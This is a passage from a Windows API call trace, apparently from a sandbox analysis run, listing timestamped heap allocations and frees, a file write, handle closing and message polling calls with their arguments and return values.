RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d78 [0172.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0172.442] WriteFile (in: hFile=0x138, lpBuffer=0x9a5d78*, nNumberOfBytesToWrite=0x52, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d78*, lpNumberOfBytesWritten=0x87f43c*=0x52, lpOverlapped=0x0) returned 1 [0172.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0172.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0172.442] CloseHandle (hObject=0x138) returned 1 [0172.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0172.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0172.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa5f008 | out: hHeap=0x8a0000) returned 1 [0172.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0172.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0172.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0172.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0172.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0172.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0172.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0172.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0172.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0172.445] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0172.446] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0172.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0172.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0172.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0172.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0172.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0172.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0172.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0172.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0172.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0172.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0172.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0172.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0172.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0172.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0172.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0172.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0172.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0172.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0172.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0172.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0172.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0172.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0172.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0172.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0172.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0172.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0172.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0172.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0172.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0172.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0172.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0172.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0172.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0172.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0172.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0172.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0172.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0172.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0172.447] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0172.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0172.447] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0172.447] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0172.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0172.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0172.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0172.447] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0172.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0172.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0172.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0172.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b30 [0172.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0172.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0172.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0172.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0172.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0172.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0172.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0172.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8d0 [0172.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0172.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0172.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0172.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0172.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0172.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0172.448] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0172.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0172.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0172.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0172.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0172.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0172.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0172.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0172.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0172.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0172.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0172.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0172.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0172.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0172.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0172.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0172.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0172.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0172.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0172.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0172.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0172.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0172.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0172.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0172.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0172.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0172.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0172.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0172.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0172.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0172.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0172.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0172.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0172.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0172.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0172.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0172.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0172.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0172.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0172.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0172.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0172.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0172.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0172.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0172.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0172.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0172.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0172.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0172.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0172.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0172.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0172.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0172.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0172.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0172.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0172.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0172.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0172.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0172.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0172.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0172.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0172.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0172.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0172.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0172.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0172.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0172.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0172.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0172.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0172.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0172.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0172.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0172.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0172.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0172.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0172.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0172.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0172.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0172.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0172.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0172.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0172.455] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0172.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0172.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0172.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0172.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0172.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0172.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0172.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0172.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0172.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0172.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0172.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0172.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0172.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0172.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0172.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0172.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0172.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0172.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0172.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0172.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0172.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0172.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0172.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0172.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0172.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0172.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0172.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0172.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0172.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0172.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0172.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0172.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0172.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0172.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0172.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0172.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0172.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0172.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0172.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0172.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0172.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0172.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0172.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0172.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0172.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0172.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0172.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0172.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0172.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0172.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0172.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0172.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0172.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0172.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0172.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0172.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0172.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0172.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0172.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0172.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0172.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0172.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0172.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0172.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0172.458] RtlAllocateHeap (HeapHandle=0x8a0000, 